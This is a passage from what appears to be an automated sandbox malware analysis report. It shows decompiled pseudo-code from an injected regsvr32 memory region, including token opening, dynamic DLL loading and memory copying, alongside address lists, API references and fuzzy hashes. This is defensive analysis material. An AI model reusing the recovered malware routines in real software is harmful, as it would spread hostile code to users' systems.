						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xbde85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xbde85000
							E049A7120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E049A5E80( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0xbde85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                                                                                                                                                                                              0x049a4106
                                                                                                                                                                                              0x049a410b
                                                                                                                                                                                              0x049a410f
                                                                                                                                                                                              0x049a4112
                                                                                                                                                                                              0x049a4112
                                                                                                                                                                                              0x049a4115
                                                                                                                                                                                              0x049a411a
                                                                                                                                                                                              0x049a411f
                                                                                                                                                                                              0x049a4122
                                                                                                                                                                                              0x049a4127
                                                                                                                                                                                              0x049a412a
                                                                                                                                                                                              0x049a4130
                                                                                                                                                                                              0x049a4130
                                                                                                                                                                                              0x049a413b
                                                                                                                                                                                              0x049a413e
                                                                                                                                                                                              0x049a4145
                                                                                                                                                                                              0x049a414a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a4150
                                                                                                                                                                                              0x049a4155
                                                                                                                                                                                              0x049a4155
                                                                                                                                                                                              0x049a415a
                                                                                                                                                                                              0x049a4160
                                                                                                                                                                                              0x049a416a
                                                                                                                                                                                              0x049a416f
                                                                                                                                                                                              0x049a4175
                                                                                                                                                                                              0x049a4194
                                                                                                                                                                                              0x049a4197
                                                                                                                                                                                              0x049a41a2
                                                                                                                                                                                              0x049a41a2
                                                                                                                                                                                              0x049a41a2
                                                                                                                                                                                              0x049a4199
                                                                                                                                                                                              0x049a4199
                                                                                                                                                                                              0x049a419b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a419d
                                                                                                                                                                                              0x049a419d
                                                                                                                                                                                              0x049a419d
                                                                                                                                                                                              0x049a419b
                                                                                                                                                                                              0x049a41aa
                                                                                                                                                                                              0x049a41af
                                                                                                                                                                                              0x049a41b4
                                                                                                                                                                                              0x049a41ba
                                                                                                                                                                                              0x049a41be
                                                                                                                                                                                              0x049a41c1
                                                                                                                                                                                              0x049a41c4
                                                                                                                                                                                              0x049a41ca
                                                                                                                                                                                              0x049a41cf
                                                                                                                                                                                              0x049a41d2
                                                                                                                                                                                              0x049a41d8
                                                                                                                                                                                              0x049a41dd
                                                                                                                                                                                              0x049a41e3
                                                                                                                                                                                              0x049a41e9
                                                                                                                                                                                              0x049a41ee
                                                                                                                                                                                              0x049a41f1
                                                                                                                                                                                              0x049a41f6
                                                                                                                                                                                              0x049a41fa
                                                                                                                                                                                              0x049a41fe
                                                                                                                                                                                              0x049a4201
                                                                                                                                                                                              0x049a4204
                                                                                                                                                                                              0x049a420d
                                                                                                                                                                                              0x049a4214
                                                                                                                                                                                              0x049a4217
                                                                                                                                                                                              0x049a421a
                                                                                                                                                                                              0x049a421f
                                                                                                                                                                                              0x049a4224
                                                                                                                                                                                              0x049a4227
                                                                                                                                                                                              0x049a422a
                                                                                                                                                                                              0x049a422a
                                                                                                                                                                                              0x049a422e
                                                                                                                                                                                              0x049a4237
                                                                                                                                                                                              0x049a423e
                                                                                                                                                                                              0x049a4241
                                                                                                                                                                                              0x049a4246
                                                                                                                                                                                              0x049a424b
                                                                                                                                                                                              0x049a424b
                                                                                                                                                                                              0x049a424e
                                                                                                                                                                                              0x049a4253
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a4177
                                                                                                                                                                                              0x049a4179
                                                                                                                                                                                              0x049a4186
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a4186
                                                                                                                                                                                              0x049a4179
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a4175
                                                                                                                                                                                              0x049a4259
                                                                                                                                                                                              0x049a425e
                                                                                                                                                                                              0x049a4261
                                                                                                                                                                                              0x049a4264
                                                                                                                                                                                              0x049a430f
                                                                                                                                                                                              0x049a430f
                                                                                                                                                                                              0x049a426a
                                                                                                                                                                                              0x049a426a
                                                                                                                                                                                              0x049a426a
                                                                                                                                                                                              0x049a426f
                                                                                                                                                                                              0x049a4299
                                                                                                                                                                                              0x049a429c
                                                                                                                                                                                              0x049a429c
                                                                                                                                                                                              0x049a42a1
                                                                                                                                                                                              0x049a42a3
                                                                                                                                                                                              0x049a42a5
                                                                                                                                                                                              0x049a42a8
                                                                                                                                                                                              0x049a42ab
                                                                                                                                                                                              0x049a42b3
                                                                                                                                                                                              0x049a42b8
                                                                                                                                                                                              0x049a42b8
                                                                                                                                                                                              0x049a42be
                                                                                                                                                                                              0x049a42c1
                                                                                                                                                                                              0x049a42c4
                                                                                                                                                                                              0x049a42c7
                                                                                                                                                                                              0x049a42c9
                                                                                                                                                                                              0x049a42c9
                                                                                                                                                                                              0x049a42ca
                                                                                                                                                                                              0x049a42ca
                                                                                                                                                                                              0x049a42c7
                                                                                                                                                                                              0x049a42d8
                                                                                                                                                                                              0x049a42db
                                                                                                                                                                                              0x049a42df
                                                                                                                                                                                              0x049a42e4
                                                                                                                                                                                              0x049a42e7
                                                                                                                                                                                              0x049a42ea
                                                                                                                                                                                              0x049a42ea
                                                                                                                                                                                              0x049a42ea
                                                                                                                                                                                              0x049a42ed
                                                                                                                                                                                              0x049a42ed
                                                                                                                                                                                              0x049a42f0
                                                                                                                                                                                              0x049a42f0
                                                                                                                                                                                              0x049a4271
                                                                                                                                                                                              0x049a4271
                                                                                                                                                                                              0x049a4281
                                                                                                                                                                                              0x049a4284
                                                                                                                                                                                              0x049a4289
                                                                                                                                                                                              0x049a4289
                                                                                                                                                                                              0x049a428c
                                                                                                                                                                                              0x049a428f
                                                                                                                                                                                              0x049a4292
                                                                                                                                                                                              0x049a4294
                                                                                                                                                                                              0x049a4294
                                                                                                                                                                                              0x049a42f3
                                                                                                                                                                                              0x049a42f5
                                                                                                                                                                                              0x049a42f8
                                                                                                                                                                                              0x049a42f8
                                                                                                                                                                                              0x049a42fe
                                                                                                                                                                                              0x049a4302
                                                                                                                                                                                              0x049a4305
                                                                                                                                                                                              0x049a4307
                                                                                                                                                                                              0x049a4307
                                                                                                                                                                                              0x049a4318
                                                                                                                                                                                              0x049a431a
                                                                                                                                                                                              0x049a431a
                                                                                                                                                                                              0x049a4322
                                                                                                                                                                                              0x049a4330
                                                                                                                                                                                              0x049a4333
                                                                                                                                                                                              0x049a4335
                                                                                                                                                                                              0x049a4355
                                                                                                                                                                                              0x049a4355
                                                                                                                                                                                              0x049a4358
                                                                                                                                                                                              0x049a435e
                                                                                                                                                                                              0x049a435f
                                                                                                                                                                                              0x049a4362
                                                                                                                                                                                              0x049a4364
                                                                                                                                                                                              0x049a4367
                                                                                                                                                                                              0x049a436a
                                                                                                                                                                                              0x049a436d
                                                                                                                                                                                              0x049a4371
                                                                                                                                                                                              0x049a4374
                                                                                                                                                                                              0x049a4377
                                                                                                                                                                                              0x049a437a
                                                                                                                                                                                              0x049a437c
                                                                                                                                                                                              0x049a437c
                                                                                                                                                                                              0x049a437f
                                                                                                                                                                                              0x049a4381
                                                                                                                                                                                              0x049a4381
                                                                                                                                                                                              0x049a4384
                                                                                                                                                                                              0x049a4386
                                                                                                                                                                                              0x049a4389
                                                                                                                                                                                              0x049a4391
                                                                                                                                                                                              0x049a4394
                                                                                                                                                                                              0x049a4399
                                                                                                                                                                                              0x049a4399
                                                                                                                                                                                              0x049a439f
                                                                                                                                                                                              0x049a43a2
                                                                                                                                                                                              0x049a43a5
                                                                                                                                                                                              0x049a43a7
                                                                                                                                                                                              0x049a43a7
                                                                                                                                                                                              0x049a43a8
                                                                                                                                                                                              0x049a43a8
                                                                                                                                                                                              0x049a43b3
                                                                                                                                                                                              0x049a43b3
                                                                                                                                                                                              0x049a43b3
                                                                                                                                                                                              0x049a43b6
                                                                                                                                                                                              0x049a43b9
                                                                                                                                                                                              0x049a43b9
                                                                                                                                                                                              0x049a43bc
                                                                                                                                                                                              0x049a43bc
                                                                                                                                                                                              0x049a437f
                                                                                                                                                                                              0x049a43bf
                                                                                                                                                                                              0x049a43c2
                                                                                                                                                                                              0x049a43c5
                                                                                                                                                                                              0x049a43c7
                                                                                                                                                                                              0x049a43ca
                                                                                                                                                                                              0x049a43cc
                                                                                                                                                                                              0x049a43cf
                                                                                                                                                                                              0x049a43d2
                                                                                                                                                                                              0x049a43d4
                                                                                                                                                                                              0x049a43d7
                                                                                                                                                                                              0x049a43df
                                                                                                                                                                                              0x049a43e7
                                                                                                                                                                                              0x049a43ea
                                                                                                                                                                                              0x049a43ea
                                                                                                                                                                                              0x049a43ea
                                                                                                                                                                                              0x049a43ed
                                                                                                                                                                                              0x049a43ed
                                                                                                                                                                                              0x049a43ed
                                                                                                                                                                                              0x049a43f0
                                                                                                                                                                                              0x049a43f6
                                                                                                                                                                                              0x049a43f8
                                                                                                                                                                                              0x049a43f8
                                                                                                                                                                                              0x049a43fe
                                                                                                                                                                                              0x049a4404
                                                                                                                                                                                              0x049a440d
                                                                                                                                                                                              0x049a4414
                                                                                                                                                                                              0x049a4416
                                                                                                                                                                                              0x049a4419
                                                                                                                                                                                              0x049a4419
                                                                                                                                                                                              0x049a441c
                                                                                                                                                                                              0x049a441c
                                                                                                                                                                                              0x049a441f
                                                                                                                                                                                              0x049a4421
                                                                                                                                                                                              0x049a4424
                                                                                                                                                                                              0x049a4426
                                                                                                                                                                                              0x049a4441
                                                                                                                                                                                              0x049a4441
                                                                                                                                                                                              0x049a4445
                                                                                                                                                                                              0x049a4448
                                                                                                                                                                                              0x049a444b
                                                                                                                                                                                              0x049a444e
                                                                                                                                                                                              0x049a4464
                                                                                                                                                                                              0x049a4464
                                                                                                                                                                                              0x049a4464
                                                                                                                                                                                              0x049a4450
                                                                                                                                                                                              0x049a4450
                                                                                                                                                                                              0x049a4452
                                                                                                                                                                                              0x049a4456
                                                                                                                                                                                              0x049a4459
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a445b
                                                                                                                                                                                              0x049a445b
                                                                                                                                                                                              0x049a445d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a445f
                                                                                                                                                                                              0x049a445f
                                                                                                                                                                                              0x049a445f
                                                                                                                                                                                              0x049a445d
                                                                                                                                                                                              0x049a4459
                                                                                                                                                                                              0x049a4468
                                                                                                                                                                                              0x049a446b
                                                                                                                                                                                              0x049a4470
                                                                                                                                                                                              0x049a447a
                                                                                                                                                                                              0x049a447a
                                                                                                                                                                                              0x049a447a
                                                                                                                                                                                              0x049a447d
                                                                                                                                                                                              0x049a4428
                                                                                                                                                                                              0x049a4428
                                                                                                                                                                                              0x049a442a
                                                                                                                                                                                              0x049a4431
                                                                                                                                                                                              0x049a4431
                                                                                                                                                                                              0x049a4433
                                                                                                                                                                                              0x049a4435
                                                                                                                                                                                              0x049a4437
                                                                                                                                                                                              0x049a443b
                                                                                                                                                                                              0x049a443d
                                                                                                                                                                                              0x049a443f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a443f
                                                                                                                                                                                              0x049a443b
                                                                                                                                                                                              0x049a442c
                                                                                                                                                                                              0x049a442c
                                                                                                                                                                                              0x049a442f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a442f
                                                                                                                                                                                              0x049a442a
                                                                                                                                                                                              0x049a4487
                                                                                                                                                                                              0x049a4489
                                                                                                                                                                                              0x049a4489
                                                                                                                                                                                              0x049a4494
                                                                                                                                                                                              0x049a4337
                                                                                                                                                                                              0x049a4337
                                                                                                                                                                                              0x049a433a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a433c
                                                                                                                                                                                              0x049a433c
                                                                                                                                                                                              0x049a433e
                                                                                                                                                                                              0x049a4342
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a4344
                                                                                                                                                                                              0x049a4344
                                                                                                                                                                                              0x049a4344
                                                                                                                                                                                              0x049a4347
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a434b
                                                                                                                                                                                              0x049a4354
                                                                                                                                                                                              0x049a4354
                                                                                                                                                                                              0x049a4347
                                                                                                                                                                                              0x049a4342
                                                                                                                                                                                              0x049a433a
                                                                                                                                                                                              0x049a4326
                                                                                                                                                                                              0x049a432f
                                                                                                                                                                                              0x049a432f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                              • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction ID: 37321376b4ba7d312c040ba6e13c40b4c74187b5590c300c7be1985c200ec0f1
                                                                                                                                                                                              • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction Fuzzy Hash: EFD10171A006009FDB24CF6DD9C4A6AB7E5FF88308B24893DE88ACB701D771F9558B95
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499C79E Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0499C79E(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x49af818; // 0x4bdf8b0
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}






                                                                                                                                                                                              0x0499c7bd
                                                                                                                                                                                              0x0499c7ef
                                                                                                                                                                                              0x0499c7ef
                                                                                                                                                                                              0x0499c7bf
                                                                                                                                                                                              0x0499c7ca
                                                                                                                                                                                              0x0499c7eb
                                                                                                                                                                                              0x0499c7eb
                                                                                                                                                                                              0x0499c7cc
                                                                                                                                                                                              0x0499c7d6
                                                                                                                                                                                              0x0499c7e9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499c7e9
                                                                                                                                                                                              0x0499c7ca
                                                                                                                                                                                              0x0499c7f4

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0499C7B1
                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,0499C8E3,00000000,04990000), ref: 0499C7B8
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0499C8E3,00000000,04990000), ref: 0499C7BF
                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,0499C8E3,00000000,04990000), ref: 0499C7E4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1515895013-0
                                                                                                                                                                                              • Opcode ID: c228a17119515786db7bdeb606287fc547c1d05208de12f255e1a8e9951eb9e2
                                                                                                                                                                                              • Instruction ID: 2c0c8ab732ffb4f6cbd627fcd47e2c3d3916ec18a4273431048b32442b70a3c5
                                                                                                                                                                                              • Opcode Fuzzy Hash: c228a17119515786db7bdeb606287fc547c1d05208de12f255e1a8e9951eb9e2
                                                                                                                                                                                              • Instruction Fuzzy Hash: D4F03A72A04215ABDF409FA8DC49B9A7BECFF49340F000870E602E7050E764FE108BA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499D218 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                              			E0499D218(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x49af81c; // 0x4bdfbe8
				_t1 = _t50 + 0x1898; // 0x0
				_t14 =  *_t1;
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E04999DF2(_t50, 0x392);
					_t66 =  *0x49af81c; // 0x4bdfbe8
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E04999E51( &_v140, 0x40, L"%08x", E0499E2C5(_t66 + 0xb0, E0499A43D(_t66 + 0xb0), 0));
					_t20 =  *0x49af81c; // 0x4bdfbe8
					_t7 = _t20 + 0xa8; // 0x1
					asm("sbb eax, eax");
					_t25 = E04999DF2(_t67, ( ~( *_t7) & 0x00000a0b) + 0xf8);
					_t26 =  *0x49af81c; // 0x4bdfbe8
					_t68 = E04999A5A(_t26 + 0x1020);
					_v12 = _t68;
					E04998BAF( &_v8);
					_t32 =  *0x49af81c; // 0x4bdfbe8
					_t34 = E04999A5A(_t32 + 0x122a);
					 *0x49af91c = _t34;
					_t35 =  *0x49af818; // 0x4bdf8b0
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x49ac9a0,  &_v140, ".", L"dll", 0, 0x49ac9a0, _t25, 0x49ac9a0, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x49af91c);
					 *0x49af914 = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0499F011(0x49acb8c, _t60);
					}
					 *0x49af918 = _t38;
					E04998BF4( &_v12, 0xfffffffe);
					E04998D6D( &_v140, 0, 0x80);
					if( *0x49af918 != 0) {
						goto L10;
					} else {
						E04998BF4(0x49af91c, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x49af918 == 0) {
						_t46 =  *0x49af850; // 0x4bdf9f0
						 *0x49af918 = _t46;
					}
					L10:
					return 1;
				}
			}

























                                                                                                                                                                                              0x0499d218
                                                                                                                                                                                              0x0499d218
                                                                                                                                                                                              0x0499d218
                                                                                                                                                                                              0x0499d21b
                                                                                                                                                                                              0x0499d227
                                                                                                                                                                                              0x0499d227
                                                                                                                                                                                              0x0499d232
                                                                                                                                                                                              0x0499d24e
                                                                                                                                                                                              0x0499d253
                                                                                                                                                                                              0x0499d25c
                                                                                                                                                                                              0x0499d25e
                                                                                                                                                                                              0x0499d266
                                                                                                                                                                                              0x0499d287
                                                                                                                                                                                              0x0499d28c
                                                                                                                                                                                              0x0499d291
                                                                                                                                                                                              0x0499d299
                                                                                                                                                                                              0x0499d2a6
                                                                                                                                                                                              0x0499d2b4
                                                                                                                                                                                              0x0499d2c5
                                                                                                                                                                                              0x0499d2cb
                                                                                                                                                                                              0x0499d2ce
                                                                                                                                                                                              0x0499d2e5
                                                                                                                                                                                              0x0499d2f1
                                                                                                                                                                                              0x0499d2f9
                                                                                                                                                                                              0x0499d300
                                                                                                                                                                                              0x0499d306
                                                                                                                                                                                              0x0499d312
                                                                                                                                                                                              0x0499d318
                                                                                                                                                                                              0x0499d31f
                                                                                                                                                                                              0x0499d332
                                                                                                                                                                                              0x0499d321
                                                                                                                                                                                              0x0499d321
                                                                                                                                                                                              0x0499d324
                                                                                                                                                                                              0x0499d32a
                                                                                                                                                                                              0x0499d32f
                                                                                                                                                                                              0x0499d334
                                                                                                                                                                                              0x0499d33f
                                                                                                                                                                                              0x0499d351
                                                                                                                                                                                              0x0499d363
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499d365
                                                                                                                                                                                              0x0499d36c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499d372
                                                                                                                                                                                              0x0499d373
                                                                                                                                                                                              0x0499d373
                                                                                                                                                                                              0x0499d37a
                                                                                                                                                                                              0x0499d37c
                                                                                                                                                                                              0x0499d381
                                                                                                                                                                                              0x0499d381
                                                                                                                                                                                              0x0499d386
                                                                                                                                                                                              0x0499d38a
                                                                                                                                                                                              0x0499d38a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                              • String ID: %08x$dll
                                                                                                                                                                                              • API String ID: 1029625771-2963171978
                                                                                                                                                                                              • Opcode ID: 51e1da1f6685ad4cd0a5ab03e56c10777d328a881a225db5913f4988dbdbdb2d
                                                                                                                                                                                              • Instruction ID: 303ad536729b8240e1c65b5a5a697670e27bf3e7798530f0d4dc2ac5d59a19d5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 51e1da1f6685ad4cd0a5ab03e56c10777d328a881a225db5913f4988dbdbdb2d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 023193B1A042047FEF50EA6CEC85F9A77ECEB86318F148135F105D7280DA38AE9587E5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 049A3674 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E049A3674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E049A358D(_a4);
				 *_t32 = "msxml3.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E0499A43D();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x49acf58;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x49acf58;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L049A8935();
				return _t29 - _t22;
			}

















                                                                                                                                                                                              0x049a3674
                                                                                                                                                                                              0x049a367f
                                                                                                                                                                                              0x049a3686
                                                                                                                                                                                              0x049a368d
                                                                                                                                                                                              0x049a3693
                                                                                                                                                                                              0x049a369b
                                                                                                                                                                                              0x049a369c
                                                                                                                                                                                              0x049a369e
                                                                                                                                                                                              0x049a36a3
                                                                                                                                                                                              0x049a36ab
                                                                                                                                                                                              0x049a36ab
                                                                                                                                                                                              0x049a36ae
                                                                                                                                                                                              0x049a36b2
                                                                                                                                                                                              0x049a36a5
                                                                                                                                                                                              0x049a36a5
                                                                                                                                                                                              0x049a36a9
                                                                                                                                                                                              0x049a36ab
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a36ab
                                                                                                                                                                                              0x049a36a9
                                                                                                                                                                                              0x049a36bb
                                                                                                                                                                                              0x049a36c4
                                                                                                                                                                                              0x049a36c9
                                                                                                                                                                                              0x049a36cc
                                                                                                                                                                                              0x049a36cf
                                                                                                                                                                                              0x049a36d2
                                                                                                                                                                                              0x049a36d4
                                                                                                                                                                                              0x049a36d4
                                                                                                                                                                                              0x049a36da
                                                                                                                                                                                              0x049a36dd
                                                                                                                                                                                              0x049a36e0
                                                                                                                                                                                              0x049a36e3
                                                                                                                                                                                              0x049a36e8
                                                                                                                                                                                              0x049a36ea
                                                                                                                                                                                              0x049a36ea
                                                                                                                                                                                              0x049a36f0
                                                                                                                                                                                              0x049a36fc
                                                                                                                                                                                              0x049a36fe
                                                                                                                                                                                              0x049a370a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 049A36BB
                                                                                                                                                                                              • _ftol2_sse.MSVCRT ref: 049A36FE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _ftol2_sselstrlen
                                                                                                                                                                                              • String ID: msxml3.dll
                                                                                                                                                                                              • API String ID: 1292649733-2158035192
                                                                                                                                                                                              • Opcode ID: e3d8bcbf15cc672d25620b441da97572636cf1fe907218b7bee629e80530b564
                                                                                                                                                                                              • Instruction ID: 167022f50fe84115f271ef058bfe7272f58a9d225d62fd5492c334c866ab1c82
                                                                                                                                                                                              • Opcode Fuzzy Hash: e3d8bcbf15cc672d25620b441da97572636cf1fe907218b7bee629e80530b564
                                                                                                                                                                                              • Instruction Fuzzy Hash: CA110232A0468DABCF10AF68E8050DE7FB5FF90350F268979DC1592241EB30E57087C1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:4.3%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                              Total number of Nodes:420
                                                                                                                                                                                              Total number of Limit Nodes:6
